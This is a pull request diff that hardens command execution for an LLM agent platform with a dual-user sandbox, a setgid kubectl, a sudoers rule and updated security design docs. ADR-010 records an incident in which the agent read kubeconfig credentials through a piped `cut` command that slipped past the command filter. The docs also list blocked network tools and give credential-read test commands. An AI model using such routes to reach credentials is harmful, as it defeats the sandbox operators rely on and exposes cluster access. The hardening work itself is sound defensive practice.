### PR TITLE
security: defense-in-depth for AgentBox command execution

### DIFF
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -34,9 +34,11 @@ Gateway + K8sSpawner  (production — one isolated pod per user)
 
 `buildSkillBundle()` packages **only team + personal skills** (never core skills). Core skills are baked into the Docker image / repo checkout. Calling `skillsHandler.materialize()` does NOT restore core skills — it only writes what's in the bundle.
 
-### 🔴 Shell Security: Whitelist-Only
+### 🔴 Shell Security: Defense-in-Depth
 
-The security model is whitelist-only (not blacklist). A binary must be explicitly listed in `ALLOWED_COMMANDS` (`src/tools/command-sets.ts`) to execute. `sed`, `awk`, `nc`, `wget` are **intentionally excluded**. kubectl is **read-only** (13 safe subcommands; all write ops permanently blocked).
+> Full spec: `docs/design/security.md` — read it before touching execution tools, Dockerfile, or K8s manifests.
+
+Primary defense: **OS-level user isolation** — child processes run as `sandbox` user (cannot read credentials); `kubectl` has setgid `kubecred` group (ADR-010). Secondary defense: **whitelist-only command validation** — binaries must be in `ALLOWED_COMMANDS` (`src/tools/command-sets.ts`). `sed`, `awk`, `nc`, `wget` are **intentionally excluded**. kubectl is **read-only** (13 safe subcommands; all write ops permanently blocked).
 
 ### 🔴 sql.js: Single-Process Lock
 
@@ -84,7 +86,7 @@ Memory tools (`memory_search`, investigation history) are **pi-agent only** — 
 **Before approving any PR, verify:**
 
 1. **Deployment mode awareness**: Does the change respect local vs K8s isolation? If it touches resource sync, skills materialization, or filesystem writes, re-read `docs/design/invariants.md §1-2`
-2. **Security model intact**: No new shell execution paths that bypass `command-sets.ts`. No weakening of the 4-pass pipeline. Skill scripts still go through review gate.
+2. **Security model intact**: No new shell execution paths that bypass `command-sets.ts`. No weakening of the 6-pass pipeline. OS user isolation preserved (ADR-010). Skill scripts still go through review gate. Read `docs/design/security.md` for full model.
 3. **PR description complete**: Must have Problem + Solution (not just diff summary). See `CONTRIBUTING.md` for format.
 4. **TypeScript conventions**: ESM-only (`.js` imports), strict mode, named exports, no default exports in barrels.
 5. **Both brain types**: Tool changes must work with both pi-agent (TypeBox) and claude-sdk (MCP/Zod) if applicable.
@@ -114,9 +116,11 @@ Agent Core
   src/core/brains/pi-agent-brain.ts
   src/core/brains/claude-sdk-brain.ts
 
-Security (read before touching)
-  src/tools/command-sets.ts    4-pass validation + ALLOWED_COMMANDS (1146 lines)
-  src/tools/restricted-bash.ts Shell tool using command-sets
+Security (read docs/design/security.md before touching)
+  src/tools/command-sets.ts    ALLOWED_COMMANDS + COMMAND_RULES + context categories
+  src/tools/command-validator.ts  6-pass validation pipeline
+  src/tools/restricted-bash.ts Shell tool (runuser sandbox + command validation)
+  src/tools/sanitize-env.ts    Environment variable sanitization
   src/gateway/skills/script-evaluator.ts  Skill script security review
 
 Resource Sync (read before touching)
@@ -167,12 +171,14 @@ DB (memory):  node:sqlite + FTS5
 **When starting a session as reviewer:**
 1. This file is already loaded (you're reading it)
 2. For architecture-sensitive PRs, load `docs/design/invariants.md`
-3. For roadmap/planning work, load `docs/design/roadmap.md`
-4. For "why was X designed this way", load `docs/design/decisions.md`
+3. For security-sensitive PRs (execution tools, Dockerfile, K8s manifests), load `docs/design/security.md`
+4. For roadmap/planning work, load `docs/design/roadmap.md`
+5. For "why was X designed this way", load `docs/design/decisions.md`
 
 **When starting a session as developer:**
 1. Check `docs/design/roadmap.md` for current phase priorities
 2. Before touching resource sync or skills: re-read invariants §1-3
-3. New architectural decisions should get an ADR in `docs/design/decisions.md`
+3. Before touching execution tools or container config: re-read `docs/design/security.md`
+4. New architectural decisions should get an ADR in `docs/design/decisions.md`
 
 **PR comments are posted via `gh` CLI as the authenticated GitHub user.**

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -119,7 +119,7 @@ Agent Core
 Security (read docs/design/security.md before touching)
   src/tools/command-sets.ts    ALLOWED_COMMANDS + COMMAND_RULES + context categories
   src/tools/command-validator.ts  6-pass validation pipeline
-  src/tools/restricted-bash.ts Shell tool (runuser sandbox + command validation)
+  src/tools/restricted-bash.ts Shell tool (sudo sandbox + command validation)
   src/tools/sanitize-env.ts    Environment variable sanitization
   src/gateway/skills/script-evaluator.ts  Skill script security review
 

--- a/Dockerfile.agentbox
+++ b/Dockerfile.agentbox
@@ -1,6 +1,11 @@
 # AgentBox Docker Image — multi-stage build
 # Stage 1: build (tsc)
 # Stage 2: production runtime
+#
+# Security: dual-user model (ADR-010, docs/design/security.md)
+#   agentbox — main Node.js process, owns credentials
+#   sandbox  — all child processes (shell commands), no credential access
+#   kubectl  — setgid kubecred group, reads kubeconfig via group permission
 
 # ── Build stage ──────────────────────────────────────────────────
 FROM node:22-slim AS builder
@@ -27,12 +32,32 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
     jq \
     python3 \
     ca-certificates \
+    sudo \
     && rm -rf /var/lib/apt/lists/*
 
 # Install kubectl
 RUN curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" \
     && chmod +x kubectl \
     && mv kubectl /usr/local/bin/
+
+# ── User & group setup (dual-user isolation) ─────────────────────
+# kubecred group: kubectl setgid grants membership to read kubeconfig
+# sandbox user:   all child processes run as this user
+# agentbox user:  main Node.js process, member of kubecred group
+# node:22-slim has UID 1000 (node user) — remove it first to avoid conflicts
+RUN userdel -r node 2>/dev/null || true \
+    && groupadd --gid 1002 kubecred \
+    && useradd --uid 1000 -m -s /bin/bash -G kubecred agentbox \
+    && useradd --uid 1001 -M -s /bin/false sandbox
+
+# sudoers: agentbox can run commands as sandbox (child process isolation)
+# SETENV allows -E flag to preserve sanitized environment
+RUN echo 'agentbox ALL=(sandbox) NOPASSWD:SETENV: ALL' > /etc/sudoers.d/sandbox-exec \
+    && chmod 440 /etc/sudoers.d/sandbox-exec
+
+# kubectl setgid: sandbox user gains kubecred group when running kubectl
+RUN chgrp kubecred /usr/local/bin/kubectl \
+    && chmod 2755 /usr/local/bin/kubectl
 
 # Create app directory
 WORKDIR /app
@@ -46,8 +71,30 @@ COPY --from=builder /app/dist/ ./dist/
 
 # Builtin skills baked into image (always available, no Gateway dependency)
 COPY skills/core/ ./skills/core/
-# Dynamic skills (team + personal) delivered via Gateway bundle API at startup
-RUN mkdir -p ./.siclaw/skills ./.siclaw/credentials
+
+# ── Directory structure & permissions ────────────────────────────
+# Credentials: agentbox:kubecred 0750 (sandbox: no access, kubectl: read via setgid)
+# Config/data: agentbox:agentbox 0700 (sandbox: no access)
+# Skills:      agentbox:agentbox 0755 (sandbox: read-only)
+# User data:   agentbox:agentbox 0777 (sandbox: read-write — only writable area)
+RUN mkdir -p ./.siclaw/skills ./.siclaw/credentials ./.siclaw/config ./.siclaw/user-data \
+    && chown -R agentbox:agentbox . \
+    && chown agentbox:kubecred ./.siclaw/credentials \
+    && chmod 0750 ./.siclaw/credentials \
+    && chmod 0700 ./.siclaw/config \
+    && chmod 0755 ./.siclaw/skills \
+    && chmod 0777 ./.siclaw/user-data
+
+# Application code: world-readable (sandbox can read, not write)
+RUN chmod -R o+rX ./dist/ ./skills/ ./node_modules/
+
+# Strip all SUID bits except sudo; verify only kubectl has SGID
+RUN find / -perm /4000 -type f ! -path '/proc/*' 2>/dev/null | while read -r f; do \
+      case "$f" in /usr/bin/sudo) ;; *) echo "Stripping SUID: $f"; chmod u-s "$f" ;; esac; \
+    done \
+    && find / -perm /2000 -type f ! -path '/proc/*' 2>/dev/null | while read -r f; do \
+         case "$f" in /usr/local/bin/kubectl) ;; *) echo "Stripping SGID: $f"; chmod g-s "$f" ;; esac; \
+       done
 
 # Environment variables
 ENV NODE_ENV=production
@@ -59,10 +106,12 @@ HEALTHCHECK --interval=30s --timeout=5s --start-period=10s --retries=3 \
 # Expose port
 EXPOSE 3000
 
-# Run as non-root user for security
-RUN useradd -m -s /bin/bash agentbox
-RUN chown -R agentbox:agentbox ./.siclaw/
-USER agentbox
+# Entrypoint enforces permissions at startup (defense against volume mount issues)
+COPY docker/agentbox-entrypoint.sh /usr/local/bin/agentbox-entrypoint.sh
+RUN chmod +x /usr/local/bin/agentbox-entrypoint.sh
 
-# Start agentbox
+# Container starts as root — entrypoint fixes volume permissions then drops to agentbox.
+# The agentbox user uses sudo to run child processes as sandbox.
+# K8s securityContext drops all capabilities except SETUID/SETGID.
+ENTRYPOINT ["/usr/local/bin/agentbox-entrypoint.sh"]
 CMD ["node", "dist/agentbox-main.js"]

--- a/docker/agentbox-entrypoint.sh
+++ b/docker/agentbox-entrypoint.sh
@@ -1,0 +1,41 @@
+#!/bin/bash
+set -e
+
+# ── AgentBox Entrypoint ────────────────────────────────────────────
+# Runs as root (no USER directive before ENTRYPOINT).
+# Fixes volume mount permissions, then drops to agentbox user.
+#
+# See: docs/design/security.md, Dockerfile.agentbox
+
+# ── Validate dual-user setup (fail-fast on build error) ───────────
+if ! id sandbox &>/dev/null; then
+  echo "FATAL: sandbox user not found — image build error." >&2
+  exit 1
+fi
+
+if ! id agentbox &>/dev/null; then
+  echo "FATAL: agentbox user not found — image build error." >&2
+  exit 1
+fi
+
+# ── Fix volume mount permissions (best-effort) ───────────────────
+# In K8s, the init-permissions container already handled this with full
+# capabilities. The main container has CAP_CHOWN/DAC_OVERRIDE dropped,
+# so these will silently fail — which is correct.
+# In standalone Docker (no init container, full caps), these succeed.
+
+chown -R agentbox:kubecred /app/.siclaw/credentials 2>/dev/null || true
+chmod 0750 /app/.siclaw/credentials 2>/dev/null || true
+find /app/.siclaw/credentials -type f -exec chmod 0640 {} \; 2>/dev/null || true
+
+chown -R agentbox:agentbox /app/.siclaw/skills 2>/dev/null || true
+chmod 0755 /app/.siclaw/skills 2>/dev/null || true
+
+chown -R agentbox:agentbox /app/.siclaw/user-data 2>/dev/null || true
+chmod 0777 /app/.siclaw/user-data 2>/dev/null || true
+
+chown -R agentbox:agentbox /app/.siclaw/config 2>/dev/null || true
+chmod 0700 /app/.siclaw/config 2>/dev/null || true
+
+# ── Drop to agentbox and exec CMD ────────────────────────────────
+exec runuser -u agentbox -- "$@"

--- a/docs/design/decisions.md
+++ b/docs/design/decisions.md
@@ -261,3 +261,46 @@ Unchanged:
 - ⚠️ AgentBox must successfully fetch settings from Gateway before creating sessions — if Gateway is unreachable, AgentBox has no LLM config (this was already the case)
 
 **Revisit when**: A legitimate use case requires env-var-based config delivery to AgentBox (e.g., sidecar injection patterns that cannot use HTTP).
+
+---
+
+## ADR-010: Dual-User OS Isolation for AgentBox Child Processes
+
+**Status**: Accepted
+
+**Context**:
+The LLM agent executes shell commands inside the AgentBox container via `restricted-bash.ts`. Previously, child processes ran as the same `agentbox` user as the main Node.js process, meaning they could read kubeconfig files, mTLS certificates, and config files.
+
+A real incident demonstrated the vulnerability: the agent used `kubectl get pods | cut -c1-2000 ~/.siclaw/credentials/kubeconfig` to read credentials via a text-processing command after a pipe. Application-level fixes (pipeOnly rules, noFilePaths checks, blockedFlags) were implemented but cannot enumerate all bypass techniques — the attack surface is fundamentally too large for application-level-only defense.
+
+Options considered:
+- **Application-level only**: COMMAND_RULES with pipeOnly, noFilePaths, blockedFlags. Implemented but insufficient as primary defense (whack-a-mole against creative command combinations).
+- **kubectl proxy**: Main process runs `kubectl proxy`, child processes use HTTP. But `kubectl exec` requires direct API connection (not proxy-able), so this is incomplete.
+- **Separate kubectl tool**: Move kubectl out of bash into a dedicated tool. Breaks natural pipeline syntax (`kubectl get pods | grep Error`).
+- **Dual-user + setgid kubectl**: Run child processes as `sandbox` user; kubectl binary gets setgid `kubecred` group for kubeconfig access. Preserves pipeline syntax, provides OS-level isolation.
+
+**Decision**:
+Adopt dual-user model with setgid kubectl:
+- Main process runs as `agentbox` (UID 1000, groups: agentbox + kubecred)
+- Child processes run as `sandbox` (UID 1001, group: sandbox) via `runuser -u sandbox`
+- kubectl binary has setgid bit for `kubecred` group (`chmod 2755`, `chgrp kubecred`)
+- Kubeconfig files: `agentbox:kubecred 0640` (readable by agentbox and kubectl, not by sandbox)
+- Other credentials: `agentbox:agentbox 0600` (readable only by agentbox)
+
+Container requires `CAP_SETUID` + `CAP_SETGID` capabilities (all others dropped).
+
+Application-level command validation (COMMAND_RULES, whitelist, shell operator blocking) is retained as defense-in-depth, not as primary credential protection.
+
+**Consequences**:
+- ✅ Credential files are OS-protected — no application-level bypass possible for file reads
+- ✅ Pipeline syntax preserved: `kubectl get pods | grep Error` works naturally
+- ✅ Application-level rules become secondary defense, not sole defense
+- ✅ `sanitizeEnv()` still needed (env vars are in-memory, not file-based)
+- ⚠️ Container needs `CAP_SETUID` + `CAP_SETGID` — all other capabilities dropped
+- ⚠️ `allowPrivilegeEscalation` must be true for setgid to work (but no SUID binaries exist)
+- ⚠️ Node.js process compromise (agentbox user) still grants kubeconfig access — mitigate with K8s RBAC scope
+- ❌ Adds ~2ms overhead per command execution (runuser fork)
+
+**Full design**: `docs/design/security.md`
+
+**Revisit when**: Container runtime supports rootless user namespace mapping natively (e.g., Kubernetes UserNamespacesSupport GA), which would eliminate the need for CAP_SETUID.

--- a/docs/design/decisions.md
+++ b/docs/design/decisions.md
@@ -282,7 +282,7 @@ Options considered:
 **Decision**:
 Adopt dual-user model with setgid kubectl:
 - Main process runs as `agentbox` (UID 1000, groups: agentbox + kubecred)
-- Child processes run as `sandbox` (UID 1001, group: sandbox) via `runuser -u sandbox`
+- Child processes run as `sandbox` (UID 1001, group: sandbox) via `sudo -E -u sandbox`
 - kubectl binary has setgid bit for `kubecred` group (`chmod 2755`, `chgrp kubecred`)
 - Kubeconfig files: `agentbox:kubecred 0640` (readable by agentbox and kubectl, not by sandbox)
 - Other credentials: `agentbox:agentbox 0600` (readable only by agentbox)
@@ -297,9 +297,9 @@ Application-level command validation (COMMAND_RULES, whitelist, shell operator b
 - ✅ Application-level rules become secondary defense, not sole defense
 - ✅ `sanitizeEnv()` still needed (env vars are in-memory, not file-based)
 - ⚠️ Container needs `CAP_SETUID` + `CAP_SETGID` — all other capabilities dropped
-- ⚠️ `allowPrivilegeEscalation` must be true for setgid to work (but no SUID binaries exist)
+- ⚠️ `allowPrivilegeEscalation` must be true for sudo's SUID and kubectl's setgid to work
 - ⚠️ Node.js process compromise (agentbox user) still grants kubeconfig access — mitigate with K8s RBAC scope
-- ❌ Adds ~2ms overhead per command execution (runuser fork)
+- ❌ Adds ~2ms overhead per command execution (sudo fork)
 
 **Full design**: `docs/design/security.md`
 

--- a/docs/design/invariants.md
+++ b/docs/design/invariants.md
@@ -116,7 +116,7 @@ Application-level command validation is a secondary defense layer.
 
 ### 3.1 OS-Level User Isolation (Primary Defense)
 
-Child processes run as `sandbox` user (via `runuser`), which cannot read credential files.
+Child processes run as `sandbox` user (via `sudo`), which cannot read credential files.
 The `kubectl` binary has setgid `kubecred` group, allowing it to read kubeconfig while other
 commands cannot. See ADR-010 and `docs/design/security.md` §3 for full design.
 

--- a/docs/design/invariants.md
+++ b/docs/design/invariants.md
@@ -107,22 +107,41 @@ draft → (request review) → pending → (AI + static analysis) → approved/r
 
 ## 3. Shell Security Model
 
-**Invariant**: The shell security system is **whitelist-only**, not blacklist-based. A command must be explicitly listed in `ALLOWED_COMMANDS` to execute. When in doubt, it is blocked.
+> **Full specification**: `docs/design/security.md` — read it before modifying execution tools,
+> Dockerfile, or K8s manifests.
 
-### 3.1 The 4-Pass Validation Pipeline
+**Invariant**: AgentBox security is **defense-in-depth with 6 independent layers**. The primary
+defense for credential protection is OS-level user isolation (dual-user + setgid kubectl).
+Application-level command validation is a secondary defense layer.
 
-Every command through `bash`, `node_exec`, `pod_exec`, or `pod_nsenter_exec` passes all 4 passes:
+### 3.1 OS-Level User Isolation (Primary Defense)
+
+Child processes run as `sandbox` user (via `runuser`), which cannot read credential files.
+The `kubectl` binary has setgid `kubecred` group, allowing it to read kubeconfig while other
+commands cannot. See ADR-010 and `docs/design/security.md` §3 for full design.
 
 ```
-Pass 1 — Shell Operators    Block: $(), backticks, <(), >(), file redirections
-Pass 2 — Binary Allowlist   Only ALLOWED_COMMANDS set can execute
-Pass 3 — kubectl Subcommands Read-only only: get, describe, logs, top, events, ...
-Pass 4 — Per-Command Flags  ~25 commands have flag-level restrictions
+agentbox user  → Main Node.js process, owns credentials
+sandbox user   → All child processes, no credential access
+kubectl setgid → kubecred group membership, reads kubeconfig only
 ```
 
-**Source**: `src/tools/command-sets.ts` (1146 lines)
+### 3.2 The 6-Pass Validation Pipeline (Secondary Defense)
 
-### 3.2 Explicitly Excluded Binaries
+Every command through `bash`, `node_exec`, `pod_exec`, or `pod_nsenter_exec` passes all 6 passes:
+
+```
+Pass 1 — Shell Operators      Block: $(), backticks, <(), >(), redirections, newlines
+Pass 2 — Pipeline Extraction   Pipe-position tracking (| vs && vs ||)
+Pass 3 — Binary Whitelist      Context-based: local | node | pod | nsenter | ssh
+Pass 4 — Pipeline Validators   kubectl subcommand + exec checks
+Pass 5 — COMMAND_RULES         Per-command: pipeOnly, noFilePaths, blockedFlags, allowedFlags
+Pass 6 — Sensitive Paths       Block commands targeting credential/config file paths
+```
+
+**Source**: `src/tools/command-validator.ts`, `src/tools/command-sets.ts`
+
+### 3.3 Explicitly Excluded Binaries
 
 These are **intentionally NOT in the allowlist** despite being common:
 
@@ -135,7 +154,7 @@ These are **intentionally NOT in the allowlist** despite being common:
 | `wget` | File download with write, recursive crawl |
 | `bash`/`sh` (direct) | Unrestricted shell — the restricted-bash tool wraps it with validation |
 
-### 3.3 kubectl Hard Restrictions
+### 3.4 kubectl Hard Restrictions
 
 Allowed subcommands (read-only):
 ```
@@ -145,9 +164,9 @@ cluster-info, config, version, explain, auth, exec
 
 **All write operations are permanently blocked**: `apply`, `create`, `delete`, `patch`, `scale`, `drain`, `cordon`, `edit`, `replace`, `label`, `taint`, `rollout undo`.
 
-`kubectl exec` commands pass through the binary allowlist (Pass 2) for the exec'd command.
+`kubectl exec` commands pass through the binary allowlist (Pass 3) for the exec'd command.
 
-### 3.4 Skill Script Exemption
+### 3.5 Skill Script Exemption
 
 Skill scripts (`skills/` directory) are **exempt from the binary allowlist** for `run_skill`. The path is verified via `fs.realpathSync()` to block symlink traversal. This is the only way to run otherwise-blocked binaries in a controlled manner — via the skill review gate.
 

--- a/docs/design/security.md
+++ b/docs/design/security.md
@@ -91,7 +91,8 @@ Two users exist inside the AgentBox container:
 | `sandbox` | 1001 | `sandbox` | All child processes (shell commands). No credential access. |
 
 The main process (Node.js) runs as `agentbox`. When executing shell commands, it uses
-`runuser -u sandbox -- bash -c "<command>"` to drop to the `sandbox` user.
+`sudo -E -u sandbox -- bash -c '<command>'` to drop to the `sandbox` user. The `-E` flag
+preserves the sanitized environment (allowed by `SETENV` in sudoers).
 
 ### 3.2 setgid kubectl
 
@@ -160,7 +161,7 @@ The dual-user model preserves natural shell pipeline syntax:
 
 ```bash
 # sandbox runs the entire pipeline; kubectl gains kubecred via setgid
-runuser -u sandbox -- bash -c "kubectl get pods -A | grep Error | wc -l"
+sudo -E -u sandbox -- bash -c 'kubectl get pods -A | grep Error | wc -l'
 ```
 
 `kubectl` (setgid kubecred) reads the kubeconfig. `grep` and `wc` (plain sandbox) cannot.
@@ -168,44 +169,64 @@ The pipe passes stdout data, not file access permissions.
 
 ### 3.5 Dockerfile Changes
 
+Key excerpts from `Dockerfile.agentbox` (see full file for build stage and other details):
+
 ```dockerfile
 FROM node:22-slim
 
-# Create groups and users
-RUN groupadd kubecred && \
-    groupadd sandbox && \
-    useradd -m -s /bin/bash -G kubecred agentbox && \
-    useradd -r -s /bin/false -g sandbox sandbox
+# System deps including sudo (for agentbox→sandbox user switching)
+RUN apt-get update && apt-get install -y --no-install-recommends \
+    curl jq python3 ca-certificates sudo && rm -rf /var/lib/apt/lists/*
 
-# Install kubectl with setgid
-COPY --from=bitnami/kubectl:latest /opt/bitnami/kubectl/bin/kubectl /usr/local/bin/kubectl
-RUN chgrp kubecred /usr/local/bin/kubectl && \
-    chmod 2755 /usr/local/bin/kubectl
+# Pin UIDs/GIDs for K8s securityContext compatibility
+RUN userdel -r node 2>/dev/null || true \
+    && groupadd --gid 1002 kubecred \
+    && useradd --uid 1000 -m -s /bin/bash -G kubecred agentbox \
+    && useradd --uid 1001 -M -s /bin/false sandbox
 
-# Set credential permissions (entrypoint also enforces this)
-RUN mkdir -p /home/agentbox/.siclaw/credentials && \
-    chown agentbox:kubecred /home/agentbox/.siclaw/credentials && \
-    chmod 0750 /home/agentbox/.siclaw/credentials
+# sudoers: agentbox can run commands as sandbox (child process isolation)
+# SETENV allows -E flag to preserve sanitized environment
+RUN echo 'agentbox ALL=(sandbox) NOPASSWD:SETENV: ALL' > /etc/sudoers.d/sandbox-exec \
+    && chmod 440 /etc/sudoers.d/sandbox-exec
 
-# Application code & skills: owned by agentbox, world-readable (sandbox can read)
-# COPY steps already produce agentbox-owned files when USER is set
-COPY --chown=agentbox:agentbox skills/ /app/skills/
-RUN chmod -R o+rX /app/ /app/skills/
+# kubectl setgid: sandbox user gains kubecred group when running kubectl
+RUN chgrp kubecred /usr/local/bin/kubectl && chmod 2755 /usr/local/bin/kubectl
 
-# User data: sandbox-writable (the only writable area for child processes)
-RUN mkdir -p /home/agentbox/.siclaw/user-data && \
-    chown agentbox:agentbox /home/agentbox/.siclaw/user-data && \
-    chmod 0777 /home/agentbox/.siclaw/user-data
+# Directory structure & permissions
+RUN mkdir -p .siclaw/skills .siclaw/credentials .siclaw/config .siclaw/user-data \
+    && chown -R agentbox:agentbox . \
+    && chown agentbox:kubecred .siclaw/credentials \
+    && chmod 0750 .siclaw/credentials \
+    && chmod 0700 .siclaw/config \
+    && chmod 0755 .siclaw/skills \
+    && chmod 0777 .siclaw/user-data
 
-USER agentbox
+# Strip all SUID except sudo; verify only kubectl has SGID
+RUN find / -perm /4000 -type f ! -path '/proc/*' 2>/dev/null | while read -r f; do \
+      case "$f" in /usr/bin/sudo) ;; *) chmod u-s "$f" ;; esac; done
+
+# Container starts as root — entrypoint fixes volume permissions then drops to agentbox
+ENTRYPOINT ["/usr/local/bin/agentbox-entrypoint.sh"]
+CMD ["node", "dist/agentbox-main.js"]
 ```
+
+**Why no `USER agentbox` directive**: The entrypoint must run as root to fix emptyDir volume
+permissions (chown/chmod), then drops to agentbox via `exec runuser -u agentbox -- "$@"`.
+The agentbox user then uses `sudo` (with its SUID bit) to run child processes as sandbox.
 
 ### 3.6 Code Changes
 
-In `src/tools/restricted-bash.ts`, the `exec()` call wraps commands with `runuser`:
+In `src/tools/restricted-bash.ts`, the `exec()` call wraps commands with `sudo` in production:
 
 ```typescript
-const finalCommand = `runuser -u sandbox -- bash -c ${shellEscape(command)}`;
+// In production (K8s pods), run child processes as sandbox user.
+// sudo's SUID elevates to root, then drops to sandbox.
+// -E preserves our sanitized env (allowed by SETENV in sudoers).
+let execCommand = finalCommand;
+if (process.env.NODE_ENV === "production") {
+  const escaped = finalCommand.replace(/'/g, "'\\''");
+  execCommand = `sudo -E -u sandbox -- bash -c '${escaped}'`;
+}
 ```
 
 The `KUBECONFIG` environment variable is still set (kubectl reads it), but the kubeconfig
@@ -310,33 +331,50 @@ However, they remain as defense-in-depth.
 ```yaml
 spec:
   securityContext:
-    runAsNonRoot: false          # Main process needs runuser (requires root or CAP_SETUID)
     seccompProfile:
       type: RuntimeDefault
+  initContainers:
+  - name: init-permissions         # Fixes emptyDir ownership as root
+    securityContext:
+      runAsUser: 0
   containers:
   - name: agentbox
     securityContext:
       capabilities:
         drop: ["ALL"]
-        add: ["SETUID", "SETGID"]  # Required for runuser -u sandbox
+        add: ["SETUID", "SETGID"]  # Required for sudo -u sandbox
       readOnlyRootFilesystem: true
     volumeMounts:
     - name: tmp
       mountPath: /tmp
-    - name: siclaw-data
-      mountPath: /home/agentbox/.siclaw
+    - name: credentials
+      mountPath: /app/.siclaw/credentials
+    - name: skills-local
+      mountPath: /app/.siclaw/skills
+    - name: user-data
+      mountPath: /app/.siclaw/user-data
   volumes:
   - name: tmp
     emptyDir:
       sizeLimit: 100Mi
+  - name: credentials
+    emptyDir: {}
+  - name: skills-local
+    emptyDir: {}
+  - name: user-data
+    emptyDir: {}
 ```
+
+**Why `readOnlyRootFilesystem`**: Prevents filesystem tampering if the agent process is
+compromised. All writable paths are explicit emptyDir mounts. `sudo` with `NOPASSWD`
+does not need timestamp caching, so no additional writable paths are needed for it.
 
 ### 5.2 Capability Justification
 
 | Capability | Why needed | Risk |
 |------------|-----------|------|
-| `SETUID` | `runuser -u sandbox` requires switching effective UID | Low — only used to drop privileges, not gain them |
-| `SETGID` | `runuser` also switches GID; kubectl setgid requires kernel enforcement | Low — setgid only grants kubecred group |
+| `SETUID` | `sudo`'s SUID bit requires this cap to switch effective UID (agentbox → sandbox) | Low — only used to drop privileges, not gain them |
+| `SETGID` | `sudo` also switches GID; kubectl's setgid bit requires kernel enforcement | Low — setgid only grants kubecred group |
 | All others | Dropped | N/A |
 
 ### 5.3 What Is Blocked
@@ -447,7 +485,7 @@ certificates and tokens in plaintext.
 | Node.js RCE (prototype pollution) | Medium — if LLM triggers Node.js vulnerability, gains agentbox user | agentbox can read kubeconfig (by design), but K8s RBAC limits cluster access |
 | kubectl vulnerability | Low — static Go binary, read-only ops, limited subcommands | Keep kubectl updated |
 | `/proc/self/environ` in child | Blocked — `sanitizeEnv()` strips secrets | Layer 5 |
-| SUID/SGID binary exploitation | Blocked — `readOnlyRootFilesystem: true`, no SUID binaries in image | Layer 3 |
+| SUID/SGID binary exploitation | Mitigated — `readOnlyRootFilesystem: true`, only `/usr/bin/sudo` retains SUID (required for user switching), all others stripped | Layer 3 |
 | Container runtime escape | Very low — standard containerd/runc, non-root child processes | Infrastructure concern, not app-level |
 | Network exfiltration | Medium — sandbox can reach network | `curl -d` blocked (Layer 2); Network Policy recommended |
 | Mount namespace manipulation | Blocked — `CAP_SYS_ADMIN` dropped | Layer 3 |
@@ -505,43 +543,47 @@ spec:
 
 ### 10.1 Dockerfile
 
-- [ ] Create `kubecred` and `sandbox` groups/users
-- [ ] Install kubectl with `chmod 2755` + `chgrp kubecred`
-- [ ] Credential dirs: `agentbox:kubecred 0750` (sandbox: no access, kubectl: read via group)
-- [ ] Config/cert files: `agentbox:agentbox 0600` (sandbox: no access)
-- [ ] Skills dirs: `agentbox:agentbox 0755/0644` (sandbox: read-only)
-- [ ] App code: `agentbox:agentbox 0755/0644` (sandbox: read-only)
-- [ ] User data dir: `agentbox:agentbox 0777` (sandbox: read-write — the only writable area)
-- [ ] Verify no SUID binaries in final image: `find / -perm /4000 -type f`
+- [x] Create `kubecred` (GID 1002), `agentbox` (UID 1000), `sandbox` (UID 1001)
+- [x] Install `sudo` + sudoers: `agentbox ALL=(sandbox) NOPASSWD:SETENV: ALL`
+- [x] Install kubectl with `chmod 2755` + `chgrp kubecred`
+- [x] Credential dirs: `agentbox:kubecred 0750` (sandbox: no access, kubectl: read via group)
+- [x] Config: `agentbox:agentbox 0700` (sandbox: no access)
+- [x] Skills dirs: `agentbox:agentbox 0755/0644` (sandbox: read-only)
+- [x] App code: `agentbox:agentbox 0755/0644` (sandbox: read-only via `chmod -R o+rX`)
+- [x] User data dir: `agentbox:agentbox 0777` (sandbox: read-write — the only writable area)
+- [x] Strip all SUID except `/usr/bin/sudo`; verify only kubectl has SGID
+- [x] Entrypoint: fixes volume permissions as root, drops to agentbox via `runuser`
 
 ### 10.2 K8s Manifests
 
-- [ ] Add `capabilities: { drop: ["ALL"], add: ["SETUID", "SETGID"] }`
-- [ ] Add `readOnlyRootFilesystem: true` with emptyDir for `/tmp`
-- [ ] Add `seccompProfile: { type: RuntimeDefault }`
-- [ ] Keep `automountServiceAccountToken: false`
+- [x] Add `capabilities: { drop: ["ALL"], add: ["SETUID", "SETGID"] }`
+- [x] Add `seccompProfile: { type: RuntimeDefault }`
+- [x] Add initContainer for volume permission fixing
+- [x] Kubeconfig mounted into credentials emptyDir (0640 agentbox:kubecred)
+- [x] Keep `automountServiceAccountToken: false`
+- [x] Add `readOnlyRootFilesystem: true` with emptyDir for `/tmp`
 - [ ] Deploy NetworkPolicy for egress restriction
 
 ### 10.3 Application Code
 
-- [ ] `restricted-bash.ts`: Wrap commands with `runuser -u sandbox --`
-- [ ] Verify `sanitizeEnv()` still strips all sensitive vars (Layer 5 remains)
-- [ ] Verify `assertPathAllowed()` still scopes file tools (Layer 4 remains)
-- [ ] Entrypoint script: enforce file permissions on startup (defense against volume mount issues)
+- [x] `restricted-bash.ts`: Wrap commands with `sudo -E -u sandbox --` in production
+- [x] Verify `sanitizeEnv()` still strips all sensitive vars (Layer 5 remains)
+- [x] Verify `assertPathAllowed()` still scopes file tools (Layer 4 remains)
+- [x] Entrypoint script: enforce file permissions on startup (best-effort in K8s, full in standalone Docker)
 
 ### 10.4 Validation
 
-File permission verification:
-- [ ] Sandbox cannot read credentials: `runuser -u sandbox -- cat .siclaw/credentials/*.kubeconfig` → Permission denied
-- [ ] Sandbox cannot read config: `runuser -u sandbox -- cat .siclaw/config/settings.json` → Permission denied
-- [ ] Sandbox cannot write skills: `runuser -u sandbox -- touch skills/core/test` → Permission denied
-- [ ] Sandbox cannot write app code: `runuser -u sandbox -- touch /app/test` → Permission denied
-- [ ] Sandbox **can** read skills: `runuser -u sandbox -- cat skills/core/cluster-events/SKILL.md` → Success
-- [ ] Sandbox **can** write user-data: `runuser -u sandbox -- touch .siclaw/user-data/test` → Success
+File permission verification (run inside agentbox container):
+- [ ] Sandbox cannot read credentials: `sudo -u sandbox cat .siclaw/credentials/*.kubeconfig` → Permission denied
+- [ ] Sandbox cannot read config: `sudo -u sandbox cat .siclaw/config/settings.json` → Permission denied
+- [ ] Sandbox cannot write skills: `sudo -u sandbox touch skills/core/test` → Permission denied
